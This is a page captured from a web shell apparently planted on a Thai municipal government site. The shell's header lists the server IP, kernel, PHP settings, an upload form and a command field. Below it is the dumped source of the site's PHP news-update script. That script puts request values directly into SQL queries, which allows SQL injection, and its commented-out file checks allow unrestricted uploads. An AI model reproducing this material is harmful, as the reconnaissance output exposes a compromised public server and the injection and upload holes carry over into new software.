403Webshell
Server IP : 119.59.102.212  /  Your IP : 3.139.94.189
Web Server : Apache/2
System : Linux narin 2.6.32-042stab142.1 #1 SMP Tue Jan 28 23:44:17 MSK 2020 x86_64
User : yangkam ( 1022)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/yangkam/domains/yangkam.go.th/public_html/coremain/module/news/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/yangkam/domains/yangkam.go.th/public_html/coremain/module/news/news_update_output.php
<?php
if(id_top_permission("news")!=1){	
	permission_fail();			
}
// Status Package Module
$status_module=select_query("status_module","cms_status_module","id","2");
if($status_module[0]!=1)	{	
	fieldset_no_module();
}
$navig['news']="แก้ไขข้อมูลข่าวประชาสัมพันธ์";
navigator($navig);
echo"<br>";
bar_header("แก้ไขข้อมูลข่าวประชาสัมพันธ์"); // Bar_Header
fieldset_top("ข่าวประชาสัมพันธ์");
include_once("class.upload.php");
if($p_who!="")										{  $who=trim($p_who);															}
if($p_topic!="")										{  $topic=trim($p_topic);														}
if($p_position_pic1!="")						{  $position_pic1=trim($p_position_pic1);							}
if($p_position_pic2!="")						{  $position_pic2=trim($p_position_pic2);							}
if($p_position_pic3!="")						{  $position_pic3=trim($p_position_pic3);							}
if($p_position_pic4!="")						{  $position_pic4=trim($p_position_pic4);							}
if($p_explain1!="")								{  $explain1=trim($p_explain1);											}
if($p_explain2!="")								{  $explain2=trim($p_explain2);											}
if($p_explain3!="")								{  $explain3=trim($p_explain3);											}
if($p_explain4!="")								{  $explain4=trim($p_explain4);											}
$userfile1_name=trim($_FILES['userfile1']['name']);
$userfile2_name=trim($_FILES['userfile2']['name']);
$userfile3_name=trim($_FILES['userfile3']['name']);
$userfile4_name=trim($_FILES['userfile4']['name']);
$userfile5_name=trim($_FILES['userfile5']['name']);
if($p_date!="")										{  $date=trim($p_date);														}
if($p_month!="")									{  $month=trim($p_month);													}
if($p_year!="")										{  $year=trim($p_year);															}
if($p_date1!="")										{  $date1=trim($p_date1);													}
if($p_month1!="")									{  $month1=trim($p_month1);												}
if($p_year1!="")										{  $year1=trim($p_year1);													}
$date_post=$year.$month.$date;
$date_line=$year1.$month1.$date1;

if($p_id_update!="")	 										{  $id_update=trim($p_id_update);			}
if($p_check_pic1!="")										{  $check_pic1=trim($p_check_pic1);		}
if($p_check_pic2!="")										{  $check_pic2=trim($p_check_pic2);		}
if($p_check_pic3!="")										{  $check_pic3=trim($p_check_pic3);		}
if($p_check_pic4!="")										{  $check_pic4=trim($p_check_pic4);		}
if($p_check_files!="")										{  $check_files=trim($p_check_files);		}
if($p_news_out!="")											{  $news_out=trim($p_news_out);				}

/*
// เช็คไฟล์ว่าถูกต้องหรือไม่
if($userfile1_name!="")			{	check_pic($userfile1_name,1);	}
if($userfile2_name!="")			{	check_pic($userfile2_name,2);	}
if($userfile3_name!="")			{	check_pic($userfile3_name,3);	}
if($userfile4_name!="")			{	check_pic($userfile4_name,4);	}
if($userfile5_name!="")			{	check_file($userfile5_name,'document');	}
*/
// Create_Filename
if($userfile1_name!="")	{	
		delete_filename("cms_news","pic1",$id_update,"$_SESSION[web_name]/mainfile/","id");
	// กำหนดชื่อไฟล์ที่ upload ใหม่ ทั้งนี้เพื่อให้ ไฟล์ไม่ซ้ำกัน
		$str  = "123456789abcdefghijkmnpqrstuvwxyz";
		$pic1 = substr(str_shuffle($str), 0, 9);
		$strings = end(explode('.', $userfile1_name));
		$strings = strtolower($strings);
		$name1="pic$pic1.$strings";
		$dlink="$_SESSION[web_name]/mainfile/".$name1;
		$hup = new upload($_FILES['userfile1']);
		if($hup->uploaded){
			$hup->image_resize = true;
			$hup->image_y  = 300;
			$hup->image_x = 400;
			$hup->image_ratio = true;			
			$hup->jpeg_quality = 95;
			$hup->image_ratio_no_zoom_in = true;
			$hup->file_new_name_body = "pic{$pic1}";
			$hup->Process("$_SESSION[web_name]/mainfile/");
			if($hup->processed){
				
			}
		}
	//*******************************************************	
} 
if($userfile2_name!="")	{	
		delete_filename("cms_news","pic2",$id_update,"$_SESSION[web_name]/mainfile/","id");
	// กำหนดชื่อไฟล์ที่ upload ใหม่ ทั้งนี้เพื่อให้ ไฟล์ไม่ซ้ำกัน
		$str  = "123456789abcdefghijkmnpqrstuvwxyz";
		$pic2 = substr(str_shuffle($str), 0, 9);
		$strings = end(explode('.', $userfile2_name));
		$strings = strtolower($strings);
		$name2="pic$pic2.$strings";
		$dlink="$_SESSION[web_name]/mainfile/".$name2;
		$hup = new upload($_FILES['userfile2']);
		if($hup->uploaded){
			$hup->image_resize = true;
			$hup->image_y  = 300;
			$hup->image_x = 400;
			$hup->image_ratio = true;			
			$hup->jpeg_quality = 95;
			$hup->image_ratio_no_zoom_in = true;
			$hup->file_new_name_body = "pic{$pic2}";
			$hup->Process("$_SESSION[web_name]/mainfile/");
			if($hup->processed){
				
			}
		}
	//*******************************************************		
}
if($userfile3_name!="")	{	
		delete_filename("cms_news","pic3",$id_update,"$_SESSION[web_name]/mainfile/","id");
	// กำหนดชื่อไฟล์ที่ upload ใหม่ ทั้งนี้เพื่อให้ ไฟล์ไม่ซ้ำกัน
		$str  = "123456789abcdefghijkmnpqrstuvwxyz";
		$pic3 = substr(str_shuffle($str), 0, 9);
		$strings = end(explode('.', $userfile3_name));
		$strings = strtolower($strings);
		$name3="pic$pic3.$strings";
		$dlink="$_SESSION[web_name]/mainfile/".$name3;
		$hup = new upload($_FILES['userfile3']);
		if($hup->uploaded){
			$hup->image_resize = true;
			$hup->image_y  = 300;
			$hup->image_x = 400;
			$hup->image_ratio = true;			
			$hup->jpeg_quality = 95;
			$hup->image_ratio_no_zoom_in = true;
			$hup->file_new_name_body = "pic{$pic3}";
			$hup->Process("$_SESSION[web_name]/mainfile/");
			if($hup->processed){
				
			}
		}
	//*******************************************************		
}
if($userfile4_name!="")	{	
		delete_filename("cms_news","pic4",$id_update,"$_SESSION[web_name]/mainfile/","id");
	// กำหนดชื่อไฟล์ที่ upload ใหม่ ทั้งนี้เพื่อให้ ไฟล์ไม่ซ้ำกัน
		$str  = "123456789abcdefghijkmnpqrstuvwxyz";
		$pic4 = substr(str_shuffle($str), 0, 9);
		$strings = end(explode('.', $userfile4_name));
		$strings = strtolower($strings);
		$name4="pic$pic4.$strings";
		$dlink="$_SESSION[web_name]/mainfile/".$name4;
		$hup = new upload($_FILES['userfile4']);
		if($hup->uploaded){
			$hup->image_resize = true;
			$hup->image_y  = 300;
			$hup->image_x = 400;
			$hup->image_ratio = true;			
			$hup->jpeg_quality = 95;
			$hup->image_ratio_no_zoom_in = true;
			$hup->file_new_name_body = "pic{$pic4}";
			$hup->Process("$_SESSION[web_name]/mainfile/");
			if($hup->processed){
				
			}
		}
	//*******************************************************		
}
if($userfile5_name!="")	{
		$name5=create_filename($userfile5_name);		
		$dlink="$_SESSION[web_name]/mainfile/".$name5;
		delete_filename("cms_news","files",$id_update,"$_SESSION[web_name]/mainfile/","id");
		upload_file_to_server2($dlink,$_FILES['userfile5']);
}

//*******แก้ไขข้อมูลลงในฐาน*************************************************
$sql="select pic1,pic2,pic3,pic4,files from cms_news where id='$id_update'";
$result=mysql_query($sql);
$data=mysql_fetch_row($result);
		if($userfile1_name=="")	{		$name1=$data[0];	}
		if($userfile2_name=="")	{		$name2=$data[1];	}
		if($userfile3_name=="")	{		$name3=$data[2];	}
		if($userfile4_name=="")	{		$name4=$data[3];	}
		if($userfile5_name=="")	{		$name5=$data[4];	}

// ######## เอาไฟล์ออกจากระบบ #######
if($check_pic1=="1" and $userfile1_name==""){
		check_pic_out("cms_news","pic1",$id_update,"$_SESSION[web_name]/mainfile/","id");
		$name1="";
}
if($check_pic2=="1" and $userfile2_name==""){
		check_pic_out("cms_news","pic2",$id_update,"$_SESSION[web_name]/mainfile/","id");
		$name2="";
}
if($check_pic3=="1" and $userfile3_name==""){
		check_pic_out("cms_news","pic3",$id_update,"$_SESSION[web_name]/mainfile/","id");
		$name3="";
}
if($check_pic4=="1" and $userfile4_name==""){
		check_pic_out("cms_news","pic4",$id_update,"$_SESSION[web_name]/mainfile/","id");
		$name4="";
}
if($check_files=="1" and $userfile5_name==""){
		check_pic_out("cms_news","files",$id_update,"$_SESSION[web_name]/mainfile/","id");
		$name5="";
}

	$sql="UPDATE `cms_news` SET `topic` = '$topic', `fulltexts` = '$fulltexts', `date_post` = '$date_post', `date_line` = '$date_line', `who` = '$main_data[name_web]',`pic1` = '$name1', `position_pic1` = '$position_pic1',`explain1` = '$explain1',`pic2` = '$name2', `position_pic2` = '$position_pic2',`explain2` = '$explain2',`pic3` = '$name3', `position_pic3` = '$position_pic3',`explain3` = '$explain3',`pic4` = '$name4', `position_pic4` = '$position_pic4',`explain4` = '$explain4',`files` = '$name5'  WHERE id='$id_update'";
	$result = mysql_query($sql) or die(mysql_error());

// ####################ข่าวภายนอกหน่วยงาน ####################
include('coremain/connec_out.php');
$sql="select pic1,pic2,pic3,pic4,files from cms_news where id='$id_update' and id_tumbon='$_SESSION[id_tumbon]'";
$result=mysql_query($sql);
$data=mysql_fetch_row($result);

// ให้ชื่อไฟล์เหมือนเดิม
		if($userfile1_name=="")	{		$name1=$data[0];	}
		if($userfile2_name=="")	{		$name2=$data[1];	}
		if($userfile3_name=="")	{		$name3=$data[2];	}
		if($userfile4_name=="")	{		$name4=$data[3];	}
		if($userfile5_name=="")	{		$name5=$data[4];	}

// เอาชื่อไฟล์ออกจากระบบ
if($check_pic1=="1" and $userfile1_name==""){		$name1="";	}
if($check_pic2=="1" and $userfile2_name==""){		$name2="";	}
if($check_pic3=="1" and $userfile3_name==""){		$name3="";	}
if($check_pic4=="1" and $userfile4_name==""){		$name4="";	}
if($check_files=="1" and $userfile5_name==""){		$name5="";	}

// ทับชื่อไฟล์เข้าไปใหม่
if($userfile1_name!="")	{	$name1="http://$_SERVER[HTTP_HOST]/$_SESSION[web_name]/mainfile/$name1"; } 
if($userfile2_name!="")	{	$name2="http://$_SERVER[HTTP_HOST]/$_SESSION[web_name]/mainfile/$name2"; } 
if($userfile3_name!="")	{	$name3="http://$_SERVER[HTTP_HOST]/$_SESSION[web_name]/mainfile/$name3"; } 
if($userfile4_name!="")	{	$name4="http://$_SERVER[HTTP_HOST]/$_SESSION[web_name]/mainfile/$name4"; } 
if($userfile5_name!="")	{	$name5="http://$_SERVER[HTTP_HOST]/$_SESSION[web_name]/mainfile/$name5"; } 

	$sql="UPDATE `cms_news` SET `topic` = '$topic', `fulltexts` = '$fulltexts', `date_post` = '$date_post', `date_line` = '$date_line', `who` = '$main_data[name_web]',`pic1` = '$name1', `position_pic1` = '$position_pic1',`explain1` = '$explain1',`pic2` = '$name2', `position_pic2` = '$position_pic2',`explain2` = '$explain2',`pic3` = '$name3', `position_pic3` = '$position_pic3',`explain3` = '$explain3',`pic4` = '$name4', `position_pic4` = '$position_pic4',`explain4` = '$explain4',`files` = '$name5',`province` = '$_SESSION[name_province]',`show_on_off` = '$news_out'  WHERE id='$id_update' and id_tumbon='$_SESSION[id_tumbon]'";
	$result = mysql_query($sql) or die(mysql_error());

mysql_close($handle_out);
include("$_SESSION[web_name]/connect.php");

msg_update_data(); // ข้อความแก้ไขแล้ว
refresh_data('index.php',1);	// refresh หน้าจอ
fieldset_down();
?>

Youez - 2016 - github.com/yon3zu
LinuXploit